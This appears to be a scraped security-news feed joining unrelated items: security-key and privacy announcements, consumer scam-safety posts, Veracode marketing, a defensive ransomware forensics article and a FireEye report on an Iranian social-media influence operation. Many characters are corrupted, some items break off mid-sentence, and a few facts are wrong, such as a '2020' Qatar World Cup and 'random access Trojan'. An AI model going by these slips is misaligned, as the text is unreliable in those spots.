The City email hack will have significant ramifications on the football industry, the power of UEFA and its enforcement of FFP will be tested. With millions at stake, Manchester City’s lawyers and UEFA will be fighting it out in the courts in the coming months, the ethics of using data leaks as evidence will be one of the key arguments

Let Him Who Is Without Sin Cast the First Stone
UEFA doesn’t exactly have a good track record on ethics either, former UEFA Chief Michel Platini was banned from all football activity for 8 years by FIFA’s Ethics Committee in 2015. In June 2019 Platini was questioned by Police in regards to his backing of Qatar's bid to host the 2020 World Cup, despite allegedly telling American officials he would be voting for the United States. Then there is the ethics of UEFA fining football clubs multi-millions for breaching FFP, while at the same time fining clubs in the low thousands for breaches of its racism rules.

Titan Security Keys – now available in Austria, Canada, France, Germany, Italy, Japan, Spain, Switzerland, and the UK



Security keys provide the strongest protection against phishing attacks. That’s why they are an important feature of the Advanced Protection Program that provides Google’s strongest account protections for users that consider themselves at a higher risk of targeted, sophisticated attacks on their personal or work Google Accounts.

Last year, we made the Titan Security Key bundle with USB-A/NFC and Bluetooth/USB/NFC keys available in Canada, France, Japan, the UK, and the US. Starting today, USB-C Titan Security Keys are available in those countries, and the bundle and USB-C Titan Security Keys are now available on the Google Store in Austria, Germany, Italy, Spain, and Switzerland.

Titan Security Keys are now available in 10 countries

Security keys use public-key cryptography to verify your identity and URL of the login page so that an attacker can’t access your account even if they have your username or password. Unlike other two-factor authentication (2FA) methods that try to verify your sign-in, security keys support FIDO standards that provide the strongest protection against automated bots, bulk phishing attacks, and targeted phishing attacks.

We highly recommend users at a higher risk of targeted attacks (e.g., political campaign teams, activists, journalists, IT administrators, executives) to get Titan Security Keys and enroll into the Advanced Protection Program (APP). If you’re working in a federal political campaigns team in the US, you can now request free Titan Security Keys via Defending Digital Campaigns and get help enrolling into the APP. Bulk orders are also available for enterprise organizations in select countries.

You can also use Titan Security Keys for any site where FIDO security keys are supported for 2FA, including your personal or work Google Account, 1Password, Bitbucket, Bitfinex, Coinbase, Dropbox, Facebook, GitHub, Salesforce, Stripe, Twitter, and more.

Complying with CCPA: Answers to common questions

Enforcement of the California Consumer Privacy Act begins this summer, but lawsuits are already being filed. To help you comply and avoid being sued, CSO contributor Maria Korolov joins IDG TECH(talk) host Juliet Beauchamp to discuss critical components of the CCPA and answer viewers’ questions.

Connect with NICE at RSA Conference 2020

At this year's RSA Conference in San Francisco, CA, NIST staff will be hosting a number of presentations, interactive meetings, demos, and panels. The following sessions may be of interest if you are attending the event from February 24-28. Attend a Session How to Deploy Secure Technologies to Help Reduce eCommerce Fraud February 25, 2020 | 1:00 PM - 1:50 PM Moscone West 2006 Learn more here. Use Cases for the NICE Cybersecurity Workforce Framework February 26, 2020 | 8:00 AM - 9:45 AM Marriott Marquis San Francisco *Separate registration required. Invite required. Please send inquiries to

Our personal health history is too valuable to be harvested by the tech giants | Eerke Boiten

Action to prevent deeper access to our private lives and data is more essential than ever

Health data paints a rich picture of our lives. Even if you remove your name, date of birth and NHS number to “anonymise” yourself, a full health history will reveal your age, gender, the places where you have lived, your family relationships and aspects of your lifestyle.

Used in combination with other available information, this may be enough to verify that this medical history relates to you personally and to target you online. Consequently, whenever the NHS shares health data, even if it is anonymised, we need to have confidence in who it goes to and what they can do with it.

When data about us influences a credit rating or a hiring decision, we are unlikely ever to find out

Continue reading...

Timeless Principles to Help Your Child Develop Social Superpowers

online relationships

“You can make more friends in two months by becoming interested in other people than you can in two years by trying to get other people interested in you.” ~ Dale Carnegie

Each year it’s my tradition to re-read a handful of books that continue to shape my perspective. One of those books is the 1936 self-help classic, How to Win Friends and Influence People by Dale Carnegie.

I’ll admit, I’ve never liked the book’s overly-schmoozy title, but its content is gold. And 84 years later, it’s still relevant to our ongoing family discussion of how to model leadership and get a more meaningful return on our digital connections.

Slow down, look around

It has become easy, and almost habitual, to move fast, skim content, and make quick judgments. We upload details about ourselves, our opinions, our activities, our agendas, our wins.

Carnegie’s approach (condensed and paraphrased): Slow down and look around. Take a genuine interest in the people around you. Make room for different points of view. Steer clear of drama, criticizing others, and conflict. And never make anyone feel “less than.”

Social superpowers

Carnegie’s principles, applied online, are tools parents can use to help kids develop their social superpowers. The simple act of slowing down and listening instead of clicking is a big step toward more genuine connections.

On the safety side, slowing down can help kids become more aware of and avoid threats such as cyberbullying, scams, catfishing, and online conflict.

Here are a few more Carnegie power tips (condensed and paraphrased) to help build up your family’s social superpowers.

More meaningful connections

Take a genuine interest in others. “If we want to make friends, let’s do things for other people – things that require time, energy, unselfishness, and thoughtfulness.”

Encourage your child to step out of the “selfie” mindset as a first step in forming more genuine friendships online (as opposed to amassing followers). Brainstorm ways to do this. Maybe it’s more face-to-face time with known friends, keeping track of other people’s birthdays, and hand-writing cards and sending them in the mail. Paying attention to the details of a person’s life — their hobbies, family members, values, and goals — is the heartbeat of a real friendship.

Smile, be welcoming.  “Actions speak louder than words, and a smile says, ‘I like you. You make me happy. I am glad to see you.’”

Sounds simple but a smile — in this case, the way we welcome others online — can go a long way. The attitude we express through our online interactions communicates can make or break our relationships and reputation.

Encourage your child to review and delete negative or harmful content that lacks a spirit of inclusion and kindness. Our social profiles may be the first impression others — including teachers, colleges, and employers — may have of us.

Another plus: Choosing a digital “smile” when we post (over drama and making fun) sends a powerful message that can ease cyberbullying, build empathy, and be a source of strength for others who may be struggling.

Note: Choosing to smile online as a general principle doesn’t include faking it or only sharing a heavily-edited or overly positive version of your life. Be real. Be honest. Be you.

Affirm others. “. . . a sure way to [people’s] hearts is to let them realize in some subtle way that you realize their importance and recognize it sincerely.”

Everyone person on the planet has a fundamental need to be noticed and feel valued. With the amount of anxiety, depression, body image issues, and cyberbullying kids face online, what young person couldn’t use a genuine word of encouragement?

Discuss the many ways to affirm others on and offline. Encourage your child to be aware and willing to complement the strengths of others, cheer on accomplishments, and support a cause or passion they’ve expressed.

Avoid arguments and criticizing others. “Criticism is dangerous because it wounds a person’s precious pride, hurts his [or her] sense of importance, and arouses resentment.”

If we could all master these two Carnegie principles online, the world’s collective mental health might be on a happier, healthier trajectory.

Encourage your child to pay attention to his or her emotions and avoid engaging others if they feel angry, anxious, or tired. Discuss the importance of empathy and forgiveness. Challenge them to allow others to express their ideas without judgment.

Avoiding conflict doesn’t mean you ignore injustice or become a doormat. On the contrary, responding with grace in a tense situation requires strength and self-control — especially when it comes to trolls and bullies.

Carnegie wrote his book during the Great Depression when the practice optimism and simple truths were critical to a person’s hope. So, some perspectives will feel odd or passé. But stick with it. Savor and apply the gems and enjoy the process of deepening your digital connections.

The post Timeless Principles to Help Your Child Develop Social Superpowers appeared first on McAfee Blogs.

6 Noteworthy Data Breaches in 2019

2019 was a banner year for breaches. Some of the biggest victims included social media heavy-hitters Facebook and TikTok, as well as financial dynamo Capital One. They???re just the tip of the iceberg: according to Forbes, over 3,000 breaches in 2019 tallied up to 4.1 billion compromised data records. That???s a whopping 22.5 million records stolen by cyberattackers every day of last year.

We know from our 10th annualツ?State of Software Securityツ?(SOSS) report that security debt is a major contributor to the risk of such breaches and attacks. We also learned that those who scan their code for security issues more frequently (300+ times per year) vastly reduce the amount of debt (and risk) they carry. DevSecOps programs that institute more frequent application scanning cadences and break down silos between security and development teams can be a leap forward for organizations like the ones that fell victim to attacks last year.

As cybersecurity becomes a more complex issue, businesses that handle sensitive data ??? from passwords to Social Security numbers, banking information, and even medical records ??? should take this ever-prevalent problem seriously in 2020 and beyond. Here???s a look at six of the biggest breaches we saw in 2019.

How You (and Your Teen) Can Stay Safe While Looking for Love Online

Valentine’s Day is such a double-edged sword. If you’re feeling the love and just can’t get enough of your sweetheart – then I wish you a wonderful day. If, on the other hand, you are unattached and feeling a little lonely then chances are you’re thinking about trying your luck on an online dating app.

Every year, traffic to dating apps surges around Valentine’s Day because let’s be honest – who wants to be lonely? But it’s not just adults who frequent dating sites to find their perfect match – teens do too!

Dating Apps – Proceed with Caution!!!

The increasing popularity of these sites means that scammers are spending considerable time and energy targeting people to con. And don’t forget that many teens are on these sites too – even as young as 16! You don’t have to look far to find stories of people who have been tricked into transferring large sums of money to their ‘online lovers’. And in more recent years, romance scammers are now tricking new partners into illegally relaying stolen funds!

Romance Scammers Now Searching for New ‘Online Love’ in Games

According to the Australian Competition and Consumer Commission (ACCC), romance scammers are now also targeting non-dating apps to look for new vulnerable ‘online lovers’. In fact, 38 Aussies lost almost $600,000 through gaming app Words with Friends, an online version of Scrabble. Most of the losses were through direct bank transfers however iTunes, Steam and Google Play gift cards were also commonly used. Games such as Words with Friends are very popular with both tweens and teens, so please share these stores with them.

How to Stay Safe While Searching for Love Online

I have several friends who have found the ‘love of their lives’ online so please remember that not everyone you meet online is a scammer. However, it is essential that you are ALWAYS on guard and cautiously suspicious until such time as your new online love has proven themselves. Here are my top tips for staying safe:

  1. Limit how personal you get 

    Scammers today prey on the human need to feel connected to one and other. The key is to be always careful with the information that you share online. Whether it’s Tinder, OkCupid, Bumble, or even Facebook or Instagram, only share what is absolutely necessary. Your personal information can easily be pieced together by a scammer to access your personal information, your bank accounts or even steal your identity. Start with being clever with your profile names on dating sites and apps – never give out your full name.

  2. Do your homework

    If you’ve met someone online, always do your homework before meeting them in person. Why not get Google working for you? A Google search is a great place to start and even using Google Images will help you get a better understanding of a person. And don’t forget to check out their LinkedIn account too. Another option would be to track down mutual friends and ask questions about your new online partner.

  3. Think before you send

    Sharing intimate pictures or videos with the person you’re dating online may be a good idea right now but please take a moment before pressing send to think about how this could come back to haunt you in the future. Remember, once those pictures and videos are online, they are online forever. Even social media apps with disappearing images, such as Snapchat, can be easily circumvented with a screenshot.  It’s not just celebrities who have intimate pictures spread around the Internet!

  4. Make passwords a priority

    Ensure all your online dating and social media accounts, and all your devices, have separate and unique passwords. Ideally, each password should have a combination of lower and upper case letters, numbers and special characters. I love using a nonsensical, crazy sentence!

And please remember to share your online romance vigilance with your budding teen Romeos and Juliets. It is incredibly common for teens to use dating sites to find someone special. Even though it may be a tad awkward and uncomfortable, as parents we need to do all we can to keep our offspring safe – particularly when their hormones are raging!!

Till Next Time!!

Happy Valentine’s Day!!

 

 

 

The post How You (and Your Teen) Can Stay Safe While Looking for Love Online appeared first on McAfee Blogs.

Watch Out For IRS Scams and Avoid Identity Theft

It’s time to get those W-2 and 1099 tax forms ready. On January 27th, the IRS began accepting paper and electronic tax returns ahead of the April 15th due date. But as users prepare to file, scammers prepare to take advantage of innocent taxpayers with malicious tactics, looking to harvest the extensive amounts of personal data found in IRS tax documents. Let’s take a look at common tactics hackers may leverage this tax season.

Impersonation Schemes

A commonly used tactic involves hackers posing as collectors from the IRS, as tax preparers, or government bureaus. This tactic is pretty effective due to Americans’ concerns of misfiling their taxes or accidentally running into trouble with the IRS. Scammers take advantage of this fear, manipulating innocent users into providing sensitive information or money over the phone or by email. And in extreme cases, hackers may be able to infect computers with malware via malicious links or attachments sent through IRS email scams.

Robocalls

Another tactic used to take advantage of taxpayers is the canceled social security number scam. Hackers use robocalls claiming that law enforcement will suspend or cancel the victim’s Social Security number in response to taxes owed. Often, victims are scared into calling the fraudulent numbers back and persuaded into transferring assets to accounts that the scammer controls. Users need to remember that the IRS will only contact taxpayers through snail-mail or in-person, not over the phone.

Emails

Another scam criminals use involves emails impersonating the IRS. Victims receive a phishing email claiming to be from the IRS, reminding them to file their taxes or offering them information about their tax refund via malicious links. If a victim clicks on the link, they will be redirected to a spoofed site that collects the victim’s personal data, facilitating identity theft. What’s more, a victim’s computer can become infected with malware if they click on a link with malicious code, allowing fraudsters to steal more data.

Phony CPAs

Scammers also take advantage of the fact that many users seek out the help of a tax preparer or CPA during this time. These criminals will often pose as professionals, accepting money to complete a user’s taxes but won’t sign the return. This makes it look like the user completed the return themselves. However, these ghost tax preparers often lie on the return to make the user qualify for credits they haven’t earned or apply changes that will get them in trouble with. Since the scammers don’t sign, the victim will then be responsible for any errors. This could lead to the user having to repay money owed, or potentially lead to an audit.

While these types of scams can occur at any time of the year, they are especially prevalent leading up to the April tax filing due date. Consumers need to be on their toes during tax season to protect their personal information and keep their finances secure. To avoid being spoofed by scammers and identity thieves, follow these tips:

  • File before a scammer does it for you. The easiest defense you can take against tax season schemes is to get your hands on your W-2 and file as soon as possible. The more prompt you are to file, the less likely your data will be raked in by a fraudster.
  • Obtain a copy of your credit report. You’re entitled to a free copy of your credit report from each of the major bureaus once a year. So, make it a habit to request a copy of your file every few months and check for any suspicious activity.
  • Beware of phishing attempts. Phishing is a common tactic crooks leverage during tax season, so stay vigilant around your inbox. This means if any unfamiliar or remotely suspicious emails come through requesting tax data, double-check their legitimacy. Be wary of strange file attachment names such as “virus-for-you.doc.” Remember: the IRS only contacts people by snail mail, so if you get an email from someone claiming to be from the IRS, stay away.
  • Watch out for spoofed websites. Scammers have extremely sophisticated tools that help disguise phony web addresses for DIY tax software, such as stolen company logos and site designs. To avoid falling for this, go directly to the source. Type the address of a website directly into the address bar of your browser instead of following a link from an email or internet search. If you receive any suspicious links in your email, investigating the domain is usually a good way to tell if the source is legitimate or not.
  • Consider an identity theft protection solution. If your data does become compromised, be sure to use an identity theft solution such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protect their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Watch Out For IRS Scams and Avoid Identity Theft appeared first on McAfee Blogs.

Veracode’s New Scan Type Delivers Results at DevSecOps Speed

Across the thousands of customer conversations we have each year, one theme continues to emerge regardless of industry, size, or geography: the pace of development is accelerating rapidly, and the pressure to innovate quickly is more intense than ever before. Veracode???s customers are not alone. A recent GitLab survey across more than 4,000 global developers found that 43 percent of teams now deploy on demand or multiple times a day, and nearly the same percentage, 41 percent, deploy between once a day and once a month.

In response to this development evolution, Veracode is evolving as well. Security testing that can???t keep up or, worse, slows developers down, will be under-utilized or ignored in this fast-paced environment. In turn, we???re announcing the latest evolution of our Static Analysis solution ??? in which we???re bringing together two existing scan types and introducing a new, first-of-its-kind scan type. The result is a comprehensive Static Analysis product family that is optimized to integrate security testing into every stage of the development pipeline, giving teams the right scan, at the right time, in the right place.

Veracode's Static Analysis family

IDE Scan

From the first line of the code, the IDE Scan provides focused, real-time security feedback to developers as they code. This scan, which returns results within seconds, helps developers remediate faster through code examples and reinforces secure coding skills as they work with visual positive reinforcement. Companies using the IDE Scan have reduced flaws introduced into new code by 60 percent.

Pipeline Scan

Results of Veracode Pipeline Scan

The first-of-its-kind in the market, the new Pipeline Scan runs on every build, providing security feedback on the code at the team level, with a median scan time of 90 seconds. This scan directly embeds into teams??? CI tooling and provides fast feedback on flaws being introduced on new commits. Teams can break the build if policy-violating flaws, based on severity or CWE category, are introduced on a commit or net-new security issues are found. Because this scan is built in line with best-in-class CI tooling, there is no learning curve for development.

Policy Scan

Before releasing the software, a Policy Scan completes a full assessment of the code, with an audit trail for compliance purposes, in a median scan time of 8 minutes. This scan evaluates applications against security policy, delivering a clear pass/fail result. Security teams and development managers gain broad visibility across their applications and the continuous feedback they need to proactively improve their overall security posture.

Each scan runs on the Veracode Static Analysis Engine, which hadツ?a developer-verified false positive rate of less than 1.1 percent across more than 7 million scans in 2019 ??? without manual tuning. Teams benefit from the assurance that they are getting consistent, accurate results alongside clear guidance on what issues to focus on and how to fix them faster, without compromising on development velocity.

Putting it into practice

After struggling with a center of excellence approach, the security team at one of our customers, a large telecommunications firm, supported development by providing them access to a variety of different static analysis solutions. While they were empowered by tooling choice, the development team still wasn???t having success remediating risk or scaling the program and was frustrated with inconsistent results.

The development team decided to standardize on one solution and, upon completion of a thorough assessment process, selected Veracode. Using a combination of scanning with Veracode Static Analysis across the SDLC, they were able to scale the program to more than 1,300 applications, resolve more than 270,000 security flaws, and reduce the number of new flaws introduced by more than 60 percent ??? all in just 90 days.

Learn more

To get more details on Veracode Static Analysis, download ourtechnical whitepaper.

CSI: Evidence Indicators for Targeted Ransomware Attacks – Part I

For many years now I have been working and teaching in the field of digital forensics, malware analysis and threat intelligence. During one of the classes we always talk about Lockard’s exchange principle: “with contact between two items, there will be an exchange”. If we translate that to the digital world: “when an adversary breaches a system, they will leave traces of evidence behind”. The challenge is often how to discover that evidence in a timely manner to take action and discover what sources are available for detection. The volatile evidence sources must be secured as soon as possible while the non-volatile sources have a lower priority. An example of order of volatility:

Table 1: Order of Volatility

In this series of two articles, you will see an example we have been observing as a concerning trend over the last couple of months.

In the first stage, companies are infected by some sort of information-stealing malware (Azorult, Dridex, Trickbot), or breached by having a weakly secured RDP server at the edge of the network.

Stage two occurs a few weeks later when the same victim is hit by a targeted ransomware campaign using Ryuk, Bitpaymer or another ransomware family the attacker has access to.

A recent example was covered by the team in this article on Bitpaymer. The adversary executing stage one does not necessarily have to be the same as the actor executing stage two. There are plenty of credentials harvested by Azorult or RDP on underground markets. Below is a screenshot from an advertiser demonstrating the number of Azorult victims (13k) they have made, including the information stolen from them:

Figure 1 Azorult C2 example

Stage 1: The Initial Infection

Figure 2 Stage 1

Although there might be some variations, the graphical overview demonstrates how most of these attacks start. Whether by a drive-by compromise where a user visits a website infected with a malicious script or a spear-phishing campaign, the result is a malware infection that steals credentials, exfiltrates them and results in having valid accounts of the victim. The other scenario is buying the valid account information from the underground. Having valid accounts will give access toward a remote service or direct access to a victim’s machine using the malware. When an adversary makes the next move, 9 out of 10 times we observe the usage of a credential dumping tool like Mimikatz, or PowerShell related activity again for password dumping. The goal? To get local-admin, domain-admin or system rights on a system within the victim’s network. The secondary goal we observe with the usage of PowerShell tools/scripts is conducting reconnaissance of the network.

Digital Evidence Initial Access stage:

T1189 Drive-By Compromise

In this scenario the victim most likely browses the Internet and visits a webpage that contains a malicious script. Following the order of Volatility, where could we discover evidence? Depending on what type of actions are defined in the malicious script, it could leave traces on disk or in memory when injected.

T1192 & T1193 Spear-phishing Link/Attachment

In this scenario, the victim receives an email with a link (T1192) or a weaponized attachment (T1193). By clicking on the link, a website is opened, and follow-up actions are executed as described above in the T1189 Drive-by compromise. The order of volatility is similar but will have a larger chain of execution. Since the user initiated the action, more digital evidence will be available on the victim’s machine:

  1. Execution of a program (Email-client)
  2. Clicking on the link will open the default configured Web-browser
  3. Web-browser visits link
  4. Script will execute

For the execution of a program and launch, there is process evidence, the prefetch directory, UserAssist, Shimcache, RecentApps and many more sources to track when they were launched and executed. The email itself can either be retrieved from the victim’s inbox or, in the case of Webmail, there might be remnants of it in the temporary Internet files. Most of the mentioned evidence artifacts are non-volatile and easy to extract in a forensically sound matter.

In the case of a spear-phishing attack with a weaponized attachment, the flow will look mostly similar to below (of course there are variations):

  1. Execution of a program (Email-client)
  2. Opening attachment
  3. Launch of Office application
  4. Execution of the macro
  5. PowerShell/WMIC followed by Internet traffic downloading file
  6. Execution of script/file
  7. Execution in memory or written to disk and execution

We already discussed the non-volatile evidence available for the execution of a program. In this example there will be evidence for the launch/execution of the email-client and the opening of an Office application to execute the attachment. In case the attachment was opened before saving to disk, in Outlook the file was copied to the “SecureTemp” folder which is a hidden folder under Temporary Internet files.

Depending on the payload of the macro, evidence will exist of Internet related traffic. When PowerShell or WMIC is used, the launch of it is recorded in the Windows Prefetch directory and there are traces in the registry and/or event logs. Depending on what type of script or file is executed, traces can be discovered in memory or on disk, with memory most volatile and disk non-volatile.

When, for example, a malware like Azorult is installed on the victim’s machine, the flow will look like this:

Figure 3 Exfiltration and Communication

The exfiltration of the data is mostly happening over TCP port 80 towards a C2 (command and control) dashboard, as demonstrated in Figure 1. Both T1043 and T1041 are techniques that will most likely leave non-volatile traces behind in network logs from devices like a proxy/gateway/firewall.

What we notice often is that infections with, for example, AZORULT are ignored/underestimated. They are being detected and the infection is either blocked or detected and later cleaned, however the capabilities of the malware are underestimated/ignored.

If we look again to table 1, the order of Volatility, the timeframe in which we operate is seconds to minutes with regards to initial network traffic and running of processes. Between infection and exfiltration is again in the timeframe of minutes, more than enough to exfiltrate credentials before an action was taken. This is also the delta in which we have the challenge – are our people, processes and technology combined capable of responding within this attack-window? Anticipating early warning signs and understanding the malware’s capabilities can assist in preventing larger damage.

What happens when the initial compromise results in having valid credentials or victim access through the RAT (random access Trojan), being used for a targeted ransomware attack? We will discuss that in the next article.

 

 

The post CSI: Evidence Indicators for Targeted Ransomware Attacks – Part I appeared first on McAfee Blogs.

Veracode Channel Leader Leslie Bois Earns Top Channel Recognition from CRN

Leslie Bois, Veracode???s Vice President of Global Channels and Alliances, has been selected to the esteemed CRN 2020 Channel Chiefs list for the third consecutive year ??? a reflection of the hard work, growth, and influence she???s introduced since joining Veracode in 2017.

Bois is responsible for developing and executing Veracode???s global strategy to build a strong partner network, which plays a significant role in the company???s go-to-market efforts. She works cross-functionally to align all aspects of the business to help channel partners grow their client list with Veracode???s platform of leading application security solutions.

Under her leadership, Veracode???s channel pipeline has grown exponentially over the past 12 months, and we???re proud to have formed hundreds of partner relationships around the world, including emerging markets such as Asia, Latin America, Europe, and the Middle East. In concurrence with this growth, Veracode is investing significantly in the further development of our global channel initiatives across multiple regions.

???I???m honored to receive this recognition from CRN. I think it???s a true testament to the dedication and commitment from Veracode to enable security at the speed of development for companies around the world,??? said Bois. ???The application security market is gaining momentum, and our focus in 2020 will be continuing to ensure that our partners across the globe are positioned to confidently provide the solutions and training businesses need to secure their software. Through dedicated partner engagement, we aim to bring our best-in-class application security platform to more businesses via our channel network.

Each of the 2020 Channel Chiefs are the cream of the IT channel crop ??? leaders who drive the channel agenda and evangelize the importance of channel partnerships. Channel Chief honorees are selected by CRN???s editorial staff on the basis of their professional achievements, standing in the industry, dedication to the channel partner community, and strategies for driving future growth and innovation.

???The IT channel is undergoing constant evolution to meet customer demands and changing business environments,??? said Bob Skelley, CEO of The Channel Company. ???CRN???s Channel Chiefs work tirelessly, leading the industry forward through superior partner programs and strategies with a focus on helping solution providers transform and grow. Our team here at The Channel Company congratulates these outstanding individuals for their dedication to the channel.???

Visit here to find out more about partnering with Veracode.

“Distinguished Impersonator” Information Operation That Previously Impersonated U.S. Politicians and Journalists on Social Media Leverages Fabricated U.S. Liberal Personas to Promote Iranian Interests

In May 2019, FireEye Threat Intelligence published a blog post exposing a network of English-language social media accounts that engaged in inauthentic behavior and misrepresentation that we assessed with low confidence was organized in support of Iranian political interests. Personas in that network impersonated candidates for U.S. House of Representatives seats in 2018 and leveraged fabricated journalist personas to solicit various individuals, including real journalists and politicians, for interviews intended to bolster desired political narratives. Since the release of that blog post, we have continued to track activity that we believe to be part of that broader operation, reporting our findings to our intelligence customers using the moniker “Distinguished Impersonator.”

Today, Facebook took action against a set of eleven accounts on the Facebook and Instagram platforms that they shared with us and, upon our independent review, we assessed were related to the broader Distinguished Impersonator activity set we’ve been tracking. We separately identified a larger set of just under 40 related accounts active on Twitter against which Twitter has also taken recent enforcement action. In this blog post, we provide insights into the recent activity and behavior of some of the personas in the Distinguished Impersonator network, in order to exemplify the tactics information operations actors are employing in their attempts to surreptitiously amplify narratives and shape political attitudes.          

Activity Overview

Personas in the Distinguished Impersonator network have continued to engage in activity similar to that we previously reported on publicly in May 2019, including social media messaging directed at politicians and media outlets; soliciting prominent individuals including academics, journalists, and activists for “media” interviews; and posting what appear to be videoclips of interviews of unknown provenance conducted with such individuals to social media. The network has also leveraged authentic media content to promote desired political narratives, including the dissemination of news articles and videoclips from Western mainstream media outlets that happen to align with Iranian interests, and has amplified the commentary of real individuals on social media.

Outside of impersonating prominent individuals such as journalists, other personas in the network have primarily posed as U.S. liberals, amplifying authentic content from other social media users broadly in line with that proclaimed political leaning, as well as material more directly in line with Iranian political interests, such as videoclips of a friendly meeting between U.S. President Trump and Crown Prince of Saudi Arabia Mohammad Bin Salman accompanied by pro-U.S. Democrat commentary, videoclips of U.S. Democratic presidential candidates discussing Saudi Arabia's role in the conflict in Yemen, and other anti-Saudi, anti-Israeli, and anti-Trump messaging. Some of this messaging has been directed at the social media accounts of U.S. politicians and media outlets (Figure 1).


Figure 1: Twitter accounts in the Distinguished Impersonator network posting anti-Israeli, anti-Saudi, and anti-Trump content

We observed direct overlap between six of the personas operating on Facebook platforms and those operating on Twitter. In one example of such overlap, the “Ryan Jensen” persona posted to both Twitter and Instagram a videoclip showing antiwar protests in the U.S. following the killing of Qasem Soleimani, commander of the Islamic Revolutionary Guards Corps’ Quds Force (IRGC-QF) by a U.S. airstrike in Baghdad in January 2020 (Figure 2). Notably, though the strike motivated some limited activity by personas in the network, the Distinguished Impersonator operation has been active since long before that incident.


Figure 2: Posts by the “Ryan Jensen” persona on Twitter and Instagram disseminating a videoclip of antiwar protests in the U.S. following the killing of Qasem Soleimani

Accounts Engaged in Concerted Replies to Influential Individuals on Twitter, Posed as Journalists and Solicited Prominent Individuals for “Media” Interviews

Personas on Twitter that we assess to be a part of the Distinguished Impersonator operation engaged in concerted replies to tweets by influential individuals and organizations, including members of the U.S. Congress and other prominent political figures, journalists, and media outlets. The personas responded to tweets with specific narratives aligned with Iranian interests, often using identical hashtags. The personas sometimes also responded with content unrelated to the tweet they were replying to, again with messaging aligned with Iranian interests. For example, a tweet regarding a NASA mission received replies from personas in the network pertaining to Iran’s seizure of a British oil tanker in July 2019. Other topics the personas addressed included U.S.-imposed sanctions on Iran and U.S. President Trump’s impeachment (Figure 3). While it is possible that the personas may have conducted such activity in the hope of eliciting responses from the specific individuals and organizations they were replying to, the multiple instances of personas responding to seemingly random tweets with unrelated political content could also indicate an intent to reach the broader Twitter audiences following those prominent accounts.


Figure 3: Twitter accounts addressing U.S.-imposed sanctions on Iran (left) and the Trump impeachment (right)

Instagram accounts that we assess to be part of the Distinguished Impersonator operation subsequently highlighted this Twitter activity by posting screen recordings of an unknown individual(s) scrolling through the responses by the personas and authentic Twitter users to prominent figures’ tweets. The Instagram account @ryanjensen7722, for example, posted a video scrolling through replies to a tweet by U.S. Senator Cory Gardner commenting on “censorship and oppression.” The video included a reply posted by @EmilyAn1996, a Twitter account we have assessed to be part of the operation, discussing potential evidence surrounding President Trump’s impeachment trial.


Figure 4: Screenshot of video posted by @ryanjensen7722 on Instagram scrolling through Twitter replies to a tweet by U.S. Senator Cory Gardner

We also observed at least two personas posing as journalists working at legitimate U.S. media outlets openly solicit prominent individuals via Twitter, including Western academics, activists, journalists, and political advisors, for interviews (Figure 5). These individuals included academic figures from organizations such as the Washington Institute for Near East Policy and the Foreign Policy Research Institute, as well as well-known U.S. conservatives opposed to U.S. President Trump and a British MP. The personas solicited the individuals’ opinions regarding topics relevant to Iran’s political interests, such as Trump’s 2020 presidential campaign, the Trump administration’s relationship with Saudi Arabia, Trump’s “deal of the century,” referring to a peace proposal regarding the Israeli-Palestinian conflict authored by the Trump administration, and a tweet by President Trump regarding former UK Prime Minister Theresa May.


Figure 5: The “James Walker” persona openly soliciting interviews from academics and journalists on Twitter

Twitter Personas Posted Opinion Polls To Solicit Views on Topics Relevant to Iranian Political Interests

Some of the personas on Twitter also posted opinion polls to solicit other users’ views on political topics, possibly for the purpose of helping to build a larger follower base through engagement. One account, @CavenessJim, posed the question: “Do you believe in Trump’s foreign policies especially what he wants to do for Israel which is called ‘the deal of the century’?” (The poll provided two options: “Yes, I do.” and “No, he cares about himself.” Of the 2,241 votes received, 99% of participants voted for the latter option, though we note that we have no visibility into the authenticity of those “voters”.) Another account, @AshleyJones524, responded to a tweet by U.S. Senator Lindsey Graham by posting a poll asking if the senator was “Trump’s lapdog,” tagging seven prominent U.S. politicians and one comedian in the post; all 24 respondents to the poll voted in the affirmative. As with the Instagram accounts’ showcasing of replies to the tweets of prominent individuals, Instagram accounts in the network also highlighted polls posted by the personas on Twitter (Figure 6).


Figure 6: Twitter account @CavenessJim posts Twitter poll (left); Instagram account @ryanjensen7722 posts video highlighting @CavenessJim's Twitter poll (right)

Videoclips of Interviews with U.S., U.K., and Israeli Individuals Posted on Iran-Based Media Outlet Tehran Times

Similar to the personas we reported on in May 2019, some of the more recently active personas posted videoclips on Facebook, Instagram, and Twitter of interviews with U.S., UK, and Israeli individuals including professors, politicians, and activists expressing views on topics aligned with Iranian political interests (Figure 7). We have thus far been unable to determine the provenance of these interviews, and note that, unlike some of the previous cases we reported on in 2019, the personas in this more recent iteration of activity did not themselves proclaim to have conducted the interviews they promoted on social media. The videoclips highlighted the interviewees’ views on issues such as U.S. foreign policy in the Middle East and U.S. relations with its political allies. Notably, we observed that at least some of the videoclips that were posted by the personas to social media have also appeared on the website of the Iranian English-language media outlet Tehran Times, both prior to and following the personas' social media posts. In other instances, Tehran Times published videoclips that appeared to be different segments of the same interviews that were posted by Distinguished Impersonator personas. Tehran Times is owned by the Islamic Propagation Organization, an entity that falls under the supervision of the Iranian Supreme Leader Ali Khamenei.


Figure 7: Facebook and Instagram accounts in the network posting videoclips of interviews with an activist and a professor

Conclusion

The activity we’ve detailed here does not, in our assessment, constitute a new activity set, but rather a continuation of an ongoing operation we believe is being conducted in support of Iranian political interests that we’ve been tracking since last year. It illustrates that the actors behind this operation continue to explore elaborate methods for leveraging the authentic political commentary of real individuals to furtively promote Iranian political interests online. The continued impersonation of journalists and the amplification of politically-themed interviews of prominent individuals also provide additional examples of what we have long referred to internally as the “media-IO nexus”, whereby actors engaging in online information operations actively leverage the credibility of the legitimate media environment to mask their activities, whether that be through the use of inauthentic news sites masquerading as legitimate media entities, deceiving legitimate media entities in order to promote desired political narratives, defacing media outlets’ websites to disseminate disinformation, spoofing legitimate media websites, or, as in this case, attempting to solicit commentary likely perceived as expedient to the actors’ political goals by adopting fake media personas.

Save the Date for the 11th Annual NICE Conference and Expo

